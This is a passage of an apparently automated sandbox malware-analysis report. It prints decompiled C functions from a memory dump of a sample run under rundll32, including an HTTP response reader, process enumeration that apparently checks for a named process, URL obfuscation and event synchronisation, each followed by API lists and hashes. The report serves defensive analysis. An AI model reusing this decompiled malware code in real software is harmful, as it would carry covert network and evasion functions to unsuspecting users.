                    • SysAllocString.OLEAUT32(04219290), ref: 04213DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04213E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04213EB2
                    • SysFreeString.OLEAUT32(?), ref: 04213EE1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: 4a11438184a4ee64a6d7927037d621bb001f3b3c83d7289970dc5cf32042281e
                    • Instruction ID: 2a0fb4a216df2a195dfe588674a46f8565a3660395994ba60c3eb0639fb8deb1
                    • Opcode Fuzzy Hash: 4a11438184a4ee64a6d7927037d621bb001f3b3c83d7289970dc5cf32042281e
                    • Instruction Fuzzy Hash: 17515E75E00619DFCB11DFA8C4889AEF7FAFF89704B144594E915EB220DB72AD41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421420F Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0421420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E042125C1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04212E5D(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0421375F(_t101,  &_v428, _a8, _t96 - _t81);
					E0421375F(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04212E5D(_t101, 0x421a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04212E5D(_a16, _a4);
						E04211212(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0421818A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04218184();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04212EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04215776(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04214A1C(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x421a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                    0x04214212
                    0x0421421e
                    0x04214224
                    0x04214229
                    0x0421422d
                    0x0421439f
                    0x042143a3
                    0x042143a3
                    0x04214233
                    0x04214237
                    0x0421423d
                    0x0421423e
                    0x04214249
                    0x0421424f
                    0x04214254
                    0x04214257
                    0x04214271
                    0x04214280
                    0x0421428c
                    0x04214296
                    0x0421429b
                    0x0421429d
                    0x042142a0
                    0x04214357
                    0x0421435d
                    0x0421436e
                    0x04214381
                    0x04214397
                    0x00000000
                    0x0421439c
                    0x042142a9
                    0x042142b0
                    0x042142b4
                    0x042142ba
                    0x042142bc
                    0x042142be
                    0x042142c0
                    0x042142c2
                    0x042142cc
                    0x042142d1
                    0x042142d3
                    0x042142d5
                    0x042142d6
                    0x042142d7
                    0x042142d8
                    0x042142df
                    0x042142e6
                    0x042142e9
                    0x042142e9
                    0x042142b6
                    0x042142b6
                    0x042142b6
                    0x042142f1
                    0x042142f9
                    0x04214305
                    0x0421430a
                    0x0421430a
                    0x0421430f
                    0x00000000
                    0x00000000
                    0x04214311
                    0x04214314
                    0x04214321
                    0x00000000
                    0x00000000
                    0x04214323
                    0x04214323
                    0x04214330
                    0x0421430a
                    0x0421430f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0421430f
                    0x0421433a
                    0x0421433d
                    0x04214340
                    0x04214347
                    0x04214347
                    0x04214354
                    0x00000000
                    0x04214354
                    0x04214240
                    0x04214244
                    0x04214245
                    0x04214247
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04214247
                    0x00000000

                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 042142C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 042142D8
                    • memset.NTDLL ref: 04214381
                    • memset.NTDLL ref: 04214397
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 74c91a5f9d2daca3f79283ed7f36f4f2f00684050b845e8f43d6e5d0319d00af
                    • Instruction ID: afd4ab62953a9de8cbd3017e3c296416bb4b1f8c3300732ddb691318483e5248
                    • Opcode Fuzzy Hash: 74c91a5f9d2daca3f79283ed7f36f4f2f00684050b845e8f43d6e5d0319d00af
                    • Instruction Fuzzy Hash: 1641A331B20219ABEB10EE68DC80BEE77B5EF65314F104569F909A71A0DB70BE55CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0421135F Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    C-Code - Quality: 42%
                    			E0421135F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x421a164() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x421a174(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E042163FD(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x421a164() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E04215867( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E042117AB(_v16);
										if(_t64 == 0) {
											_t64 = E042116E7(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E04215867( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E042158EE(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                    0x0421135f
                    0x04211360
                    0x04211366
                    0x04211371
                    0x04211371
                    0x04211373
                    0x04212402
                    0x04212407
                    0x04212409
                    0x0421240e
                    0x0421240f
                    0x04212414
                    0x04212415
                    0x04212420
                    0x04212451
                    0x04212456
                    0x04212519
                    0x0421245c
                    0x04212463
                    0x0421246b
                    0x04212516
                    0x04212471
                    0x04212476
                    0x0421247d
                    0x04212480
                    0x04212508
                    0x04212486
                    0x04212486
                    0x04212488
                    0x0421248e
                    0x0421248f
                    0x0421248f
                    0x04212492
                    0x04212495
                    0x0421249b
                    0x042124a0
                    0x042124a1
                    0x042124a6
                    0x042124a9
                    0x042124b4
                    0x00000000
                    0x00000000
                    0x042124bc
                    0x042124c4
                    0x042124d0
                    0x042124d4
                    0x042124d6
                    0x042124db
                    0x00000000
                    0x00000000
                    0x042124db
                    0x042124d4
                    0x042124ed
                    0x042124f0
                    0x042124f7
                    0x04212502
                    0x04212502
                    0x00000000
                    0x042124dd
                    0x042124dd
                    0x042124e2
                    0x042124e4
                    0x042124e5
                    0x042124e8
                    0x00000000
                    0x042124e8
                    0x00000000
                    0x042124e2
                    0x0421248f
                    0x04212509
                    0x04212509
                    0x0421250f
                    0x0421250f
                    0x0421246b
                    0x04212422
                    0x04212428
                    0x04212430
                    0x04212449
                    0x0421244b
                    0x00000000
                    0x00000000
                    0x04212432
                    0x0421243c
                    0x04212440
                    0x04212446
                    0x00000000
                    0x04212446
                    0x04212440
                    0x04212430
                    0x04212522
                    0x04211368
                    0x04211368
                    0x0421136f
                    0x0421137a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0421136f

                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04212409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04212422
                    • ResetEvent.KERNEL32(?), ref: 0421249B
                    • GetLastError.KERNEL32 ref: 042124B6
                      • Part of subcall function 042158EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04215905
                      • Part of subcall function 042158EE: SetEvent.KERNEL32(?), ref: 04215915
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04215947
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421596C
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421598C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 3860d71ca1668a0a2b60bc0ace1649569d890d0de6a340c604d2bd1e8415b4b8
                    • Instruction ID: 90bcd6c56697bc923e9661aacd7cfbebec0724205e169b00b68e16059752e4b3
                    • Opcode Fuzzy Hash: 3860d71ca1668a0a2b60bc0ace1649569d890d0de6a340c604d2bd1e8415b4b8
                    • Instruction Fuzzy Hash: F741D432710201EBDB219FA8DC44A6AB3F9EF94360F1505A4F556E3170EB70F941DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213FD2 Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E04213FD2(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x421a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x421a320; // 0x87d5a8
				_t3 = _t8 + 0x421b87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E042132D0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x421a34c, 1, 0, _t30);
					E042117AB(_t30);
				}
				_t12 =  *0x421a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04212AB4() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E0421196A(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x421a118( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E042178DB(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                    0x04213fd3
                    0x04213fda
                    0x04213fe4
                    0x04213fe8
                    0x04213fee
                    0x04213ffd
                    0x04214004
                    0x04214008
                    0x0421401a
                    0x0421401c
                    0x0421401c
                    0x04214021
                    0x04214028
                    0x0421407d
                    0x0421407d
                    0x04214083
                    0x04214085
                    0x04214085
                    0x0421408f
                    0x04214093
                    0x042140a5
                    0x042140a5
                    0x042140a9
                    0x042140af
                    0x042140af
                    0x00000000
                    0x04214041
                    0x04214046
                    0x0421404e
                    0x04214050
                    0x04214054
                    0x04214054
                    0x04214061
                    0x04214065
                    0x04214069
                    0x042140be
                    0x042140c4
                    0x042140c4
                    0x04214077
                    0x0421407b
                    0x042140b2
                    0x042140b4
                    0x042140b7
                    0x042140b7
                    0x00000000
                    0x042140b4
                    0x0421407b
                    0x00000000
                    0x04214065

                    APIs
                      • Part of subcall function 042132D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04A99D58,00000000,?,?,69B25F44,00000005,0421A00C,4D283A53,?,?), ref: 04213306
                      • Part of subcall function 042132D0: lstrcpy.KERNEL32(00000000,00000000), ref: 0421332A
                      • Part of subcall function 042132D0: lstrcat.KERNEL32(00000000,00000000), ref: 04213332
                    • CreateEventA.KERNEL32(0421A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 04214013
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,0421186F,00000000,00000000,?,00000000,?,0421186F,?,?,?), ref: 04214071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 0421409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 042140B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: f631358878c90f7de9c8df79e076ab25f19c5e4ea47e64ad64875674bc5aedcf
                    • Instruction ID: c83b3560bace01d54620fbd131af1134bf265504772bd5e55cefba14572115ff
                    • Opcode Fuzzy Hash: f631358878c90f7de9c8df79e076ab25f19c5e4ea47e64ad64875674bc5aedcf
                    • Instruction Fuzzy Hash: 09214B327203125BD3356A699C48E6B73D9EFA8B15F050115FD8997171DB25EC418641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042117C0 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E042117C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04216710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E0421238A(_t23);
						}
					}
					return _t38;
				}
				if(E042140C7(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x421a34c, 1, 0,  *0x421a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04215E53(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04212B1E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04214B59(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04213FD2( &_v32, _t39);
					goto L13;
				}
			}












                    0x042117c0
                    0x042117cd
                    0x042117d3
                    0x042117d4
                    0x042117d5
                    0x042117d6
                    0x042117d7
                    0x042117db
                    0x042117e7
                    0x042117eb
                    0x04211873
                    0x04211873
                    0x04211876
                    0x04211878
                    0x04211880
                    0x04211886
                    0x04211889
                    0x04211889
                    0x04211886
                    0x04211894
                    0x04211894
                    0x042117fe
                    0x04211800
                    0x04211800
                    0x04211817
                    0x0421181b
                    0x0421181e
                    0x04211829
                    0x04211830
                    0x04211830
                    0x0421183c
                    0x0421183d
                    0x0421184b
                    0x0421183f
                    0x0421183f
                    0x04211840
                    0x04211841
                    0x04211842
                    0x04211843
                    0x04211844
                    0x04211844
                    0x04211850
                    0x04211855
                    0x04211857
                    0x04211859
                    0x04211859
                    0x04211860
                    0x00000000
                    0x04211862
                    0x04211862
                    0x0421186f
                    0x00000000
                    0x0421186f

                    APIs
                    • CreateEventA.KERNEL32(0421A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04211811
                    • SetEvent.KERNEL32(00000000), ref: 0421181E
                    • Sleep.KERNEL32(00000BB8), ref: 04211829
                    • CloseHandle.KERNEL32(00000000), ref: 04211830
                      • Part of subcall function 04215E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04211850,?,04211850,?,?,?,?,?,04211850,?), ref: 04215F2D
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 2b5a63bd9a855234fdf29eaf08e7dcff08e9e0a3180fb4b2543fbde2f15ad660
                    • Instruction ID: 32fb6245c370c590fb0086ab5d018bdab6d7355f31fac5706ba291469b632a0a
                    • Opcode Fuzzy Hash: 2b5a63bd9a855234fdf29eaf08e7dcff08e9e0a3180fb4b2543fbde2f15ad660
                    • Instruction Fuzzy Hash: A621CB72F10119ABEB10AFE49884AFEB3F9EF28354B018425EA11A7060DB74F941C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04215ACD Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04215ACD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x421a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x421a2f0; // 0x18be026f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x421a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                    0x04215ad5
                    0x04215ad8
                    0x04215ade
                    0x04215af6
                    0x04215afa
                    0x04215afd
                    0x04215aff
                    0x04215b02
                    0x04215b04
                    0x04215b07
                    0x04215b09
                    0x04215b09
                    0x04215b0b
                    0x04215b16
                    0x04215b1b
                    0x04215b2c
                    0x04215b34
                    0x04215b39
                    0x04215b3c
                    0x04215b3f
                    0x04215b41
                    0x04215b47
                    0x04215b4a
                    0x04215b4a
                    0x04215b4a
                    0x04215b55
                    0x04215b5a
                    0x04215b64

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0421194D,00000000,?,?,04216ABB,?,04A995B0), ref: 04215AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04215AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0421194D,00000000,?,?,04216ABB,?,04A995B0), ref: 04215B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04215B55
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: c650e53997b3be1c5ea4c03f2f4caa9c3f7a926808952089ffa466a7079f5df0
                    • Instruction ID: ed33e0f73d1ba115062d4358aa2ceef8c356fa733630e9d5f7801b4f4434fdf9
                    • Opcode Fuzzy Hash: c650e53997b3be1c5ea4c03f2f4caa9c3f7a926808952089ffa466a7079f5df0
                    • Instruction Fuzzy Hash: 15110672B00215FFD7148B69EC88E9EBFFDEBA1260B0401A6F50597160EB75AE44C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04212AB4 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E04212AB4() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x421a320; // 0x87d5a8
						_t2 = _t9 + 0x421bea8; // 0x73617661
						_push( &_v264);
						if( *0x421a110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                    0x04212abf
                    0x04212ac9
                    0x04212acd
                    0x04212ad7
                    0x04212b08
                    0x04212ade
                    0x04212ae3
                    0x04212af0
                    0x04212af9
                    0x04212b10
                    0x04212afb
                    0x04212b03
                    0x00000000
                    0x04212b03
                    0x04212b11
                    0x04212b12
                    0x00000000
                    0x04212b12
                    0x00000000
                    0x04212b0c
                    0x04212b18
                    0x04212b1d

                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04212AC4
                    • Process32First.KERNEL32(00000000,?), ref: 04212AD7
                    • Process32Next.KERNEL32(00000000,?), ref: 04212B03
                    • CloseHandle.KERNEL32(00000000), ref: 04212B12
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: b2d4de9b1e67c90118113adb4546a3106bacea018c369e4d61966843a1ac0800
                    • Instruction ID: 08e2a2585a9a08f442e855f9ddef55bec6143cb634b14f4475b3b761c4754b5c
                    • Opcode Fuzzy Hash: b2d4de9b1e67c90118113adb4546a3106bacea018c369e4d61966843a1ac0800
                    • Instruction Fuzzy Hash: 84F09632711124ABD721AE35AC4DFDB76ECEBE5714F0000D1F915E7020EA64EA85C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04216156 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04216156(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
